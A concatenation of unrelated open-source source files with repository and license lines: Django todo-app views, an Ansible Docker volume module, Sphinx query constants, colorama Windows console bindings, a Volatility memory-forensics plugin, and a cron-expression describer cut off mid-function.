return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_delete(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.delete()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_undelete(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.undelete()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_complete(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.toggle_complete()
t.save()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_postpone(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.postpone()
t.save()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_edit(request, todo_id, mobile=False):
t=Todo.objects_raw.get(id=int(todo_id))
_check_permission(request, t.list)
if request.method == 'POST':
if 'priority' in request.POST: t.priority=int(request.POST['priority'])
if 'description' in request.POST: t.description=request.POST['description']
if 'list_id' in request.POST: t.list=List.objects.get(id=int(request.POST['list_id']))
if 'due_date' in request.POST:
t.due_date=None
if request.POST['due_date']:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y/%m/%d %H:%M') # 2012/12/21 15:42
except:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y/%m/%d') # 2012/12/21
except:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y-%m-%dT%H:%M') # 2012-12-21T15:42 - for html5 input type
except:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y-%m-%d') # 2012-12-21 - for html5 input type
except:
pass # wrong format
if 'repeat_type' in request.POST: t.repeat_type=request.POST['repeat_type']
if 'repeat_every' in request.POST and request.POST['repeat_every']: t.repeat_every=int(request.POST['repeat_every'])
if 'notify_minutes' in request.POST and request.POST['notify_minutes']: t.notify_minutes=int(request.POST['notify_minutes'])
if 'time_offset' in request.POST and request.POST['time_offset']: t.time_offset=int(request.POST['time_offset'])
t.update_notify_todo()
t.save()
#return render_to_response('todo/todo_item.html', RequestContext(request, {'todo':t,}))
return HttpResponseRedirect('/todo/ajax/todo/show_item/'+str(t.id));
else:
return render_to_response('todo/todo_edit.html', RequestContext(request, {'todo':t,'repeat_type_choiches':Todo.repeat_type_choiches,'lists':List.objects.filter(owner=_get_current_user(request)), 'mobile':mobile}))
@my_login_required
def list_edit(request, list_id):
l=List.objects.get(id=int(list_id))
_check_permission(request, l)
if request.method == 'POST':
if 'name' in request.POST: l.name=request.POST['name']
l.save()
return HttpResponse("", mimetype="text/plain")
#return render_to_response('todo/todo_item.html', RequestContext(request, {'todo':t,}))
else:
return render_to_response('todo/list_edit.html', RequestContext(request, {'list':l}))
@my_login_required
def todo_show_item(request, todo_id, mobile=False):
t = Todo.objects_raw.get(id=int(todo_id))
_check_permission(request, t.list)
return render_to_response('todo/todo_item.html', RequestContext(request, {'todo':t, 'mobile':mobile}))
@my_login_required
def todo_add(request):
l=List.objects.get(id=request.POST['list_id'])
_check_permission(request, l)
t=Todo()
t.description=request.POST['description']
for p in range(1,4):
if t.description[0:2]=="!"+str(p):
t.priority=p
t.description=t.description[2:]
t.list=l
t.save()
out = t.id
return HttpResponse(out, mimetype="text/plain")
@my_login_required
def import_rtm(request):
if request.method == 'POST':
form = ImportRtmForm(request.POST)
if not form.is_valid(): return HttpResponse("FORM ERROR", mimetype="text/plain")
url = form.cleaned_data['url']
if url == "":
for t in Todo.objects_raw.filter(external_source="ATOM"):
if t.list.owner==_get_current_user(request): t.delete_raw()
return HttpResponse("Empty atom feed received. Cleanup complete.", mimetype="text/plain")
import urllib2
text = urllib2.urlopen(url).read()
#return HttpResponse(text, mimetype="text/plain")
from xml.dom import minidom
from datetime import datetime
#xmldoc = minidom.parseString(text.encode( "utf-8" ))
xmldoc = minidom.parseString(text)
entries=xmldoc.getElementsByTagName("entry")
out=""
for e in entries:
t = Todo()
t.description = e.getElementsByTagName("title")[0].firstChild.nodeValue
t.deleted = False
t.completed = False
t.external_source = "ATOM"
t.external_id = e.getElementsByTagName("id")[0].firstChild.nodeValue
out += 'external_id: "'+e.getElementsByTagName("id")[0].firstChild.nodeValue+'"\n'
out += "title: "+e.getElementsByTagName("title")[0].firstChild.nodeValue+"\n"
count=0
field_name = ""
for c in e.getElementsByTagName("content")[0].getElementsByTagName("span"):
#out += ('"'+(c.firstChild.nodeValue or u"*")+'" ')
if count % 2 == 0:
field_name = str(c.firstChild.nodeValue).strip()[0:-1]
else:
out += '"%s"=>"%s"' % (field_name, c.firstChild.nodeValue)
if field_name == "Due":
t.due_date = _parse_date(c.firstChild.nodeValue)
elif field_name == "Priority":
t.priority = str(_parse_priority(c.firstChild.nodeValue))
elif field_name == "List":
t.list = _parse_list(c.firstChild.nodeValue, _get_current_user(request))
elif field_name == "URL":
t.description += " (%s)" % (c.firstChild.firstChild.nodeValue,)
elif field_name == "Repeat every":
t.repeat_every = int(c.firstChild.nodeValue)
elif field_name == "Repeat type":
t.repeat_type = _parse_repeat_type(c.firstChild.nodeValue)
out += u"\n"
count+=1
out += t.__unicode__() +"\n"
out += "\n"
t.save()
return HttpResponse(out, mimetype="text/plain")
else:
return render_to_response("todo/import_rtm_form.html",RequestContext(request, {'form': ImportRtmForm()}))
@my_login_required
def export_atom(request):
list=[]
for t in Todo.objects.filter(complete=False):
if t.list.owner==_get_current_user(request): list.append(t)
return render_to_response("todo/export_atom.atom",RequestContext(request, {'todos': list})) # , mimetype="application/atom+xml"
#return HttpResponse(out, mimetype="text/plain")
#return HttpResponse(out, mimetype="application/atom+xml")
def cache_manifest(request):
#import uuid
#guid=uuid.uuid1()
return HttpResponse(get_template('todo/cache.manifest').render(RequestContext(request, {'host': request.META.get('HTTP_HOST')})), mimetype="text/cache-manifest")
def redirect_login(request):
return render_to_response("todo/redirect_login.html",RequestContext(request, {}))
def do_logout(request):
logout(request)
return HttpResponseRedirect(settings.KISSTODO_SITE_URL)
def _parse_date(date):
# 'never' or 'Mon 13 Jun 11 18:30' or 'Mon 13 Jun 11'
if date=='never': return None
try:
dt = datetime.strptime(date, '%a %d %b %y %H:%M')
except:
dt = datetime.strptime(date, '%a %d %b %y')
return dt
def _parse_priority(priority):
# 'none', '1', '2', '3'
if priority=='none': return 4
return int(priority)
def _parse_repeat_type(r):
# 'none', 'd', 'w', 'm', 'y'
if r=='none': return ''
return r
def _parse_list(list, user):
if list=='Inbox':
return List.objects.get_or_create_inbox(user)
else:
list, created = List.objects.get_or_create(name=list, owner=user)
return list
return int(priority)
def _check_permission(request, list):
if list.owner!=_get_current_user(request): raise Exception("Permission denied")
def _get_current_user(request):
if settings.KISSTODO_USE_GAE:
user = users.get_current_user()
if user: return user.nickname()
else:
return request.user.username
class ImportRtmForm(forms.Form):
#text = forms.CharField(widget=forms.Textarea(), label='Atom feed', required=False)
url = forms.CharField(label='url', required=False)
| gpl-3.0 |
kbrebanov/ansible | lib/ansible/modules/cloud/docker/docker_volume.py | 45 | 7796 | #!/usr/bin/python
# coding: utf-8
#
# Copyright 2017 Red Hat | Ansible, Alex Grönholm <alex.gronholm@nextday.fi>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = u'''
module: docker_volume
version_added: "2.4"
short_description: Manage Docker volumes
description:
- Create/remove Docker volumes.
- Performs largely the same function as the "docker volume" CLI subcommand.
options:
name:
description:
- Name of the volume to operate on.
required: true
aliases:
- volume_name
driver:
description:
- Specify the type of volume. Docker provides the C(local) driver, but 3rd party drivers can also be used.
default: local
driver_options:
description:
- "Dictionary of volume settings. Consult docker docs for valid options and values:
U(https://docs.docker.com/engine/reference/commandline/volume_create/#driver-specific-options)"
labels:
description:
- List of labels to set for the volume
force:
description:
- With state C(present) causes the volume to be deleted and recreated if the volume already
exist and the driver, driver options or labels differ. This will cause any data in the existing
volume to be lost.
type: bool
default: 'no'
state:
description:
- C(absent) deletes the volume.
- C(present) creates the volume, if it does not already exist.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- docker
author:
- Alex Grönholm (@agronholm)
requirements:
- "python >= 2.6"
- "docker-py >= 1.10.0"
- "The docker server >= 1.9.0"
'''
EXAMPLES = '''
- name: Create a volume
docker_volume:
name: volume_one
- name: Remove a volume
docker_volume:
name: volume_one
state: absent
- name: Create a volume with options
docker_volume:
name: volume_two
driver_options:
type: btrfs
device: /dev/sda2
'''
RETURN = '''
facts:
description: Volume inspection results for the affected volume.
returned: success
type: dict
sample: {}
'''
try:
from docker.errors import APIError
except ImportError:
# missing docker-py handled in ansible.module_utils.docker
pass
from ansible.module_utils.docker_common import DockerBaseClass, AnsibleDockerClient
from ansible.module_utils.six import iteritems, text_type
class TaskParameters(DockerBaseClass):
def __init__(self, client):
super(TaskParameters, self).__init__()
self.client = client
self.volume_name = None
self.driver = None
self.driver_options = None
self.labels = None
self.force = None
self.debug = None
for key, value in iteritems(client.module.params):
setattr(self, key, value)
class DockerVolumeManager(object):
def __init__(self, client):
self.client = client
self.parameters = TaskParameters(client)
self.check_mode = self.client.check_mode
self.results = {
u'changed': False,
u'actions': []
}
self.diff = self.client.module._diff
self.existing_volume = self.get_existing_volume()
state = self.parameters.state
if state == 'present':
self.present()
elif state == 'absent':
self.absent()
def get_existing_volume(self):
try:
volumes = self.client.volumes()
except APIError as e:
self.client.fail(text_type(e))
if volumes[u'Volumes'] is None:
return None
for volume in volumes[u'Volumes']:
if volume['Name'] == self.parameters.volume_name:
return volume
return None
def has_different_config(self):
"""
Return the list of differences between the current parameters and the existing volume.
:return: list of options that differ
"""
differences = []
if self.parameters.driver and self.parameters.driver != self.existing_volume['Driver']:
differences.append('driver')
if self.parameters.driver_options:
if not self.existing_volume.get('Options'):
differences.append('driver_options')
else:
for key, value in iteritems(self.parameters.driver_options):
if (not self.existing_volume['Options'].get(key) or
value != self.existing_volume['Options'][key]):
differences.append('driver_options.%s' % key)
if self.parameters.labels:
existing_labels = self.existing_volume.get('Labels', {})
all_labels = set(self.parameters.labels) | set(existing_labels)
for label in all_labels:
if existing_labels.get(label) != self.parameters.labels.get(label):
differences.append('labels.%s' % label)
return differences
def create_volume(self):
if not self.existing_volume:
if not self.check_mode:
try:
resp = self.client.create_volume(self.parameters.volume_name,
driver=self.parameters.driver,
driver_opts=self.parameters.driver_options,
labels=self.parameters.labels)
self.existing_volume = self.client.inspect_volume(resp['Name'])
except APIError as e:
self.client.fail(text_type(e))
self.results['actions'].append("Created volume %s with driver %s" % (self.parameters.volume_name, self.parameters.driver))
self.results['changed'] = True
def remove_volume(self):
if self.existing_volume:
if not self.check_mode:
try:
self.client.remove_volume(self.parameters.volume_name)
except APIError as e:
self.client.fail(text_type(e))
self.results['actions'].append("Removed volume %s" % self.parameters.volume_name)
self.results['changed'] = True
def present(self):
differences = []
if self.existing_volume:
differences = self.has_different_config()
if differences and self.parameters.force:
self.remove_volume()
self.existing_volume = None
self.create_volume()
if self.diff or self.check_mode or self.parameters.debug:
self.results['diff'] = differences
if not self.check_mode and not self.parameters.debug:
self.results.pop('actions')
self.results['ansible_facts'] = {u'docker_volume': self.get_existing_volume()}
def absent(self):
self.remove_volume()
def main():
argument_spec = dict(
volume_name=dict(type='str', required=True, aliases=['name']),
state=dict(type='str', default='present', choices=['present', 'absent']),
driver=dict(type='str', default='local'),
driver_options=dict(type='dict', default={}),
labels=dict(type='list'),
force=dict(type='bool', default=False),
debug=dict(type='bool', default=False)
)
client = AnsibleDockerClient(
argument_spec=argument_spec,
supports_check_mode=True
)
cm = DockerVolumeManager(client)
client.module.exit_json(**cm.results)
if __name__ == '__main__':
main()
| gpl-3.0 |
abhijo89/sphinxit | sphinxit/core/constants.py | 4 | 1436 | """
sphinxit.core.constants
~~~~~~~~~~~~~~~~~~~~~~~
Defines some Sphinx-specific constants.
:copyright: (c) 2013 by Roman Semirook.
:license: BSD, see LICENSE for more details.
"""
from collections import namedtuple
RESERVED_KEYWORDS = (
'AND',
'AS',
'ASC',
'AVG',
'BEGIN',
'BETWEEN',
'BY',
'CALL',
'COLLATION',
'COMMIT',
'COUNT',
'DELETE',
'DESC',
'DESCRIBE',
'DISTINCT',
'FALSE',
'FROM',
'GLOBAL',
'GROUP',
'IN',
'INSERT',
'INTO',
'LIMIT',
'MATCH',
'MAX',
'META',
'MIN',
'NOT',
'NULL',
'OPTION',
'OR',
'ORDER',
'REPLACE',
'ROLLBACK',
'SELECT',
'SET',
'SHOW',
'START',
'STATUS',
'SUM',
'TABLES',
'TRANSACTION',
'TRUE',
'UPDATE',
'VALUES',
'VARIABLES',
'WARNINGS',
'WEIGHT',
'WHERE',
'WITHIN'
)
ESCAPED_CHARS = namedtuple('EscapedChars', ['single_escape', 'double_escape'])(
single_escape=("'", '+', '[', ']', '=', '*'),
double_escape=('@', '!', '^', '(', ')', '~', '-', '|', '/', '<<', '$', '"')
)
NODES_ORDER = namedtuple('NodesOrder', ['select', 'update'])(
select=(
'SelectFrom',
'Where',
'GroupBy',
'OrderBy',
'WithinGroupOrderBy',
'Limit',
'Options'
),
update=(
'UpdateSet',
'Where',
'Options'
)
)
| bsd-3-clause |
chaoallsome/pip | pip/_vendor/colorama/win32.py | 446 | 5121 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
# from winbase.h
STDOUT = -11
STDERR = -12
try:
import ctypes
from ctypes import LibraryLoader
windll = LibraryLoader(ctypes.WinDLL)
from ctypes import wintypes
except (AttributeError, ImportError):
windll = None
SetConsoleTextAttribute = lambda *_: None
else:
from ctypes import byref, Structure, c_char, POINTER
COORD = wintypes._COORD
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
"""struct in wincon.h."""
_fields_ = [
("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", wintypes.WORD),
("srWindow", wintypes.SMALL_RECT),
("dwMaximumWindowSize", COORD),
]
def __str__(self):
return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
self.dwSize.Y, self.dwSize.X
, self.dwCursorPosition.Y, self.dwCursorPosition.X
, self.wAttributes
, self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
)
_GetStdHandle = windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [
wintypes.DWORD,
]
_GetStdHandle.restype = wintypes.HANDLE
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [
wintypes.HANDLE,
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
_SetConsoleTextAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
]
_SetConsoleTextAttribute.restype = wintypes.BOOL
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
_SetConsoleCursorPosition.argtypes = [
wintypes.HANDLE,
COORD,
]
_SetConsoleCursorPosition.restype = wintypes.BOOL
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
_FillConsoleOutputCharacterA.argtypes = [
wintypes.HANDLE,
c_char,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
_FillConsoleOutputAttribute.argtypes = [
wintypes.HANDLE,
wintypes.WORD,
wintypes.DWORD,
COORD,
POINTER(wintypes.DWORD),
]
_FillConsoleOutputAttribute.restype = wintypes.BOOL
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
_SetConsoleTitleW.argtypes = [
wintypes.LPCSTR
]
_SetConsoleTitleW.restype = wintypes.BOOL
handles = {
STDOUT: _GetStdHandle(STDOUT),
STDERR: _GetStdHandle(STDERR),
}
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
handle = handles[stream_id]
csbi = CONSOLE_SCREEN_BUFFER_INFO()
success = _GetConsoleScreenBufferInfo(
handle, byref(csbi))
return csbi
def SetConsoleTextAttribute(stream_id, attrs):
handle = handles[stream_id]
return _SetConsoleTextAttribute(handle, attrs)
def SetConsoleCursorPosition(stream_id, position, adjust=True):
position = COORD(*position)
# If the position is out of range, do nothing.
if position.Y <= 0 or position.X <= 0:
return
# Adjust for Windows' SetConsoleCursorPosition:
# 1. being 0-based, while ANSI is 1-based.
# 2. expecting (x,y), while ANSI uses (y,x).
adjusted_position = COORD(position.Y - 1, position.X - 1)
if adjust:
# Adjust for viewport's scroll position
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
adjusted_position.Y += sr.Top
adjusted_position.X += sr.Left
# Resume normal processing
handle = handles[stream_id]
return _SetConsoleCursorPosition(handle, adjusted_position)
def FillConsoleOutputCharacter(stream_id, char, length, start):
handle = handles[stream_id]
char = c_char(char.encode())
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
success = _FillConsoleOutputCharacterA(
handle, char, length, start, byref(num_written))
return num_written.value
def FillConsoleOutputAttribute(stream_id, attr, length, start):
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
handle = handles[stream_id]
attribute = wintypes.WORD(attr)
length = wintypes.DWORD(length)
num_written = wintypes.DWORD(0)
# Note that this is hard-coded for ANSI (vs wide) bytes.
return _FillConsoleOutputAttribute(
handle, attribute, length, start, byref(num_written))
def SetConsoleTitle(title):
return _SetConsoleTitleW(title)
| mit |
loveshell/volatility | volatility/plugins/linux/vma_cache.py | 58 | 2724 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
from volatility.plugins.linux.slab_info import linux_slabinfo
class linux_vma_cache(linux_common.AbstractLinuxCommand):
"""Gather VMAs from the vm_area_struct cache"""
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
self._config.add_option('UNALLOCATED', short_option = 'u',
default = False,
help = 'Show unallocated',
action = 'store_true')
def calculate(self):
linux_common.set_plugin_members(self)
has_owner = self.profile.obj_has_member("mm_struct", "owner")
cache = linux_slabinfo(self._config).get_kmem_cache("vm_area_struct", self._config.UNALLOCATED)
for vm in cache:
start = vm.vm_start
end = vm.vm_end
if has_owner and vm.vm_mm and vm.vm_mm.is_valid():
task = vm.vm_mm.owner
(task_name, pid) = (task.comm, task.pid)
else:
(task_name, pid) = ("", "")
if vm.vm_file and vm.vm_file.is_valid():
path = vm.vm_file.dentry.get_partial_path()
else:
path = ""
yield task_name, pid, start, end, path
def render_text(self, outfd, data):
self.table_header(outfd, [("Process", "16"),
("PID", "6"),
("Start", "[addrpad]"),
("End", "[addrpad]"),
("Path", "")])
for task_name, pid, start, end, path in data:
self.table_row(outfd, task_name, pid, start, end, path)
| gpl-2.0 |
Salamek/cron-descriptor | cron_descriptor/ExpressionDescriptor.py | 1 | 22709 | # The MIT License (MIT)
#
# Copyright (c) 2016 Adam Schubert
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import datetime
import calendar
from .GetText import GetText
from .CasingTypeEnum import CasingTypeEnum
from .DescriptionTypeEnum import DescriptionTypeEnum
from .ExpressionParser import ExpressionParser
from .Options import Options
from .StringBuilder import StringBuilder
from .Exception import FormatException, WrongArgumentException
class ExpressionDescriptor(object):
"""
Converts a Cron Expression into a human readable string
"""
_special_characters = ['/', '-', ',', '*']
_expression = ''
_options = None
_expression_parts = []
_parsed = False
def __init__(self, expression, options=None, **kwargs):
"""Initializes a new instance of the ExpressionDescriptorclass
Args:
expression: The cron expression string
options: Options to control the output description
Raises:
WrongArgumentException: if kwarg is unknow
"""
if options is None:
options = Options()
self._expression = expression
self._options = options
self._expression_parts = []
self._parsed = False
# if kwargs in _options, overwrite it, if not raise exeption
for kwarg in kwargs:
if hasattr(self._options, kwarg):
setattr(self._options, kwarg, kwargs[kwarg])
else:
raise WrongArgumentException(
"Unknow {} configuration argument".format(kwarg))
# Initializes localization
GetText(options.locale_code)
def get_description(self, description_type=DescriptionTypeEnum.FULL):
"""Generates a human readable string for the Cron Expression
Args:
description_type: Which part(s) of the expression to describe
Returns:
The cron expression description
Raises:
Exception: if throw_exception_on_parse_error is True
"""
try:
if self._parsed is False:
parser = ExpressionParser(self._expression, self._options)
self._expression_parts = parser.parse()
self._parsed = True
choices = {
DescriptionTypeEnum.FULL: self.get_full_description,
DescriptionTypeEnum.TIMEOFDAY: self.get_time_of_day_description,
DescriptionTypeEnum.HOURS: self.get_hours_description,
DescriptionTypeEnum.MINUTES: self.get_minutes_description,
DescriptionTypeEnum.SECONDS: self.get_seconds_description,
DescriptionTypeEnum.DAYOFMONTH: self.get_day_of_month_description,
DescriptionTypeEnum.MONTH: self.get_month_description,
DescriptionTypeEnum.DAYOFWEEK: self.get_day_of_week_description,
DescriptionTypeEnum.YEAR: self.get_year_description,
}
description = choices.get(description_type, self.get_seconds_description)()
except Exception as ex:
if self._options.throw_exception_on_parse_error:
raise
else:
description = str(ex)
return description
def get_full_description(self):
"""Generates the FULL description
Returns:
The FULL description
Raises:
FormatException: if formating fails and throw_exception_on_parse_error is True
"""
try:
time_segment = self.get_time_of_day_description()
day_of_month_desc = self.get_day_of_month_description()
month_desc = self.get_month_description()
day_of_week_desc = self.get_day_of_week_description()
year_desc = self.get_year_description()
description = "{0}{1}{2}{3}{4}".format(
time_segment,
day_of_month_desc,
day_of_week_desc,
month_desc,
year_desc)
description = self.transform_verbosity(
description, self._options.verbose)
description = self.transform_case(
description,
self._options.casing_type)
except Exception:
description = _(
"An error occured when generating the expression description. Check the cron expression syntax.")
if self._options.throw_exception_on_parse_error:
raise FormatException(description)
return description
def get_time_of_day_description(self):
"""Generates a description for only the TIMEOFDAY portion of the expression
Returns:
The TIMEOFDAY description
"""
seconds_expression = self._expression_parts[0]
minute_expression = self._expression_parts[1]
hour_expression = self._expression_parts[2]
description = StringBuilder()
# handle special cases first
if any(exp in minute_expression for exp in self._special_characters) is False and \
any(exp in hour_expression for exp in self._special_characters) is False and \
any(exp in seconds_expression for exp in self._special_characters) is False:
# specific time of day (i.e. 10 14)
description.append(_("At "))
description.append(
self.format_time(
hour_expression,
minute_expression,
seconds_expression))
elif "-" in minute_expression and \
"," not in minute_expression and \
any(exp in hour_expression for exp in self._special_characters) is False:
# minute range in single hour (i.e. 0-10 11)
minute_parts = minute_expression.split('-')
description.append(_("Every minute between {0} and {1}").format(
self.format_time(hour_expression, minute_parts[0]), self.format_time(hour_expression, minute_parts[1])))
elif "," in hour_expression and "-" not in hour_expression and \
any(exp in minute_expression for exp in self._special_characters) is False:
# hours list with single minute (o.e. 30 6,14,16)
hour_parts = hour_expression.split(',')
description.append(_("At"))
for i, hour_part in enumerate(hour_parts):
description.append(" ")
description.append(
self.format_time(hour_part, minute_expression))
if i < (len(hour_parts) - 2):
description.append(",")
if i == len(hour_parts) - 2:
description.append(_(" and"))
else:
# default time description
seconds_description = self.get_seconds_description()
minutes_description = self.get_minutes_description()
hours_description = self.get_hours_description()
description.append(seconds_description)
if description:
description.append(", ")
description.append(minutes_description)
if description:
description.append(", ")
description.append(hours_description)
return str(description)
def get_seconds_description(self):
"""Generates a description for only the SECONDS portion of the expression
Returns:
The SECONDS description
"""
return self.get_segment_description(
self._expression_parts[0],
_("every second"),
lambda s: s,
lambda s: _("every {0} seconds").format(s),
lambda s: _("seconds {0} through {1} past the minute"),
lambda s: _("at {0} seconds past the minute")
)
def get_minutes_description(self):
"""Generates a description for only the MINUTE portion of the expression
Returns:
The MINUTE description
"""
return self.get_segment_description(
self._expression_parts[1],
_("every minute"),
lambda s: s,
lambda s: _("every {0} minutes").format(s),
lambda s: _("minutes {0} through {1} past the hour"),
lambda s: '' if s == "0" else _("at {0} minutes past the hour")
)
def get_hours_description(self):
"""Generates a description for only the HOUR portion of the expression
Returns:
The HOUR description
"""
expression = self._expression_parts[2]
return self.get_segment_description(
expression,
_("every hour"),
lambda s: self.format_time(s, "0"),
lambda s: _("every {0} hours").format(s),
lambda s: _("between {0} and {1}"),
lambda s: _("at {0}")
)
def get_day_of_week_description(self):
"""Generates a description for only the DAYOFWEEK portion of the expression
Returns:
The DAYOFWEEK description
"""
if self._expression_parts[5] == "*" and self._expression_parts[3] != "*":
# DOM is specified and DOW is * so to prevent contradiction like "on day 1 of the month, every day"
# we will not specified a DOW description.
return ""
def get_day_name(s):
exp = s
if "#" in s:
exp, useless = s.split("#", 2)
elif "L" in s:
exp = exp.replace("L", '')
return self.number_to_day(int(exp))
def get_format(s):
if "#" in s:
day_of_week_of_month = s[s.find("#") + 1:]
try:
day_of_week_of_month_number = int(day_of_week_of_month)
choices = {
1: _("first"),
2: _("second"),
3: _("third"),
4: _("forth"),
5: _("fifth"),
}
day_of_week_of_month_description = choices.get(day_of_week_of_month_number, '')
except ValueError:
day_of_week_of_month_description = ''
formated = "{}{}{}".format(_(", on the "),
day_of_week_of_month_description, _(" {0} of the month"))
elif "L" in s:
formated = _(", on the last {0} of the month")
else:
formated = _(", only on {0}")
return formated
return self.get_segment_description(
self._expression_parts[5],
_(", every day"),
lambda s: get_day_name(s),
lambda s: _(", every {0} days of the week").format(s),
lambda s: _(", {0} through {1}"),
lambda s: get_format(s)
)
def get_month_description(self):
"""Generates a description for only the MONTH portion of the expression
Returns:
The MONTH description
"""
return self.get_segment_description(
self._expression_parts[4],
'',
lambda s: datetime.date(datetime.date.today().year, int(s), 1).strftime("%B"),
lambda s: _(", every {0} months").format(s),
lambda s: _(", {0} through {1}"),
lambda s: _(", only in {0}")
)
def get_day_of_month_description(self):
"""Generates a description for only the DAYOFMONTH portion of the expression
Returns:
The DAYOFMONTH description
"""
expression = self._expression_parts[3]
expression = expression.replace("?", "*")
if expression == "L":
description = _(", on the last day of the month")
elif expression == "LW" or expression == "WL":
description = _(", on the last weekday of the month")
else:
regex = re.compile("(\\d{1,2}W)|(W\\d{1,2})")
if regex.match(expression):
m = regex.match(expression)
day_number = int(m.group().replace("W", ""))
day_string = _("first weekday") if day_number == 1 else _("weekday nearest day {0}").format(
day_number)
description = _(", on the {0} of the month").format(
day_string)
else:
description = self.get_segment_description(
expression,
_(", every day"),
lambda s: s,
lambda s: _(", every day") if s == "1" else _(", every {0} days"),
lambda s: _(", between day {0} and {1} of the month"),
lambda s: _(", on day {0} of the month")
)
return description
def get_year_description(self):
"""Generates a description for only the YEAR portion of the expression
Returns:
The YEAR description
"""
def format_year(s):
regex = re.compile(r"^\d+$")
if regex.match(s):
year_int = int(s)
if year_int < 1900:
return year_int
return datetime.date(year_int, 1, 1).strftime("%Y")
else:
return s
return self.get_segment_description(
self._expression_parts[6],
'',
lambda s: format_year(s),
lambda s: _(", every {0} years").format(s),
lambda s: _(", {0} through {1}"),
lambda s: _(", only in {0}")
)
def get_segment_description(
self,
expression,
all_description,
get_single_item_description,
get_interval_description_format,
get_between_description_format,
get_description_format
):
"""Returns segment description
Args:
expression: Segment to descript
all_description: *
get_single_item_description: 1
get_interval_description_format: 1/2
get_between_description_format: 1-2
get_description_format: format get_single_item_description
Returns:
segment description
"""
description = None
if expression is None or expression == '':
description = ''
elif expression == "*":
description = all_description
elif any(ext in expression for ext in ['/', '-', ',']) is False:
description = get_description_format(expression).format(
get_single_item_description(expression))
elif "/" in expression:
segments = expression.split('/')
description = get_interval_description_format(
segments[1]).format(get_single_item_description(segments[1]))
# interval contains 'between' piece (i.e. 2-59/3 )
if "-" in segments[0]:
between_segment_description = self.generate_between_segment_description(
segments[0], get_between_description_format, get_single_item_description)
if not between_segment_description.startswith(", "):
description += ", "
description += between_segment_description
elif any(ext in segments[0] for ext in ['*', ',']) is False:
range_item_description = get_description_format(segments[0]).format(
get_single_item_description(segments[0])
)
range_item_description = range_item_description.replace(", ", "")
description += _(", starting {0}").format(range_item_description)
elif "," in expression:
segments = expression.split(',')
description_content = ''
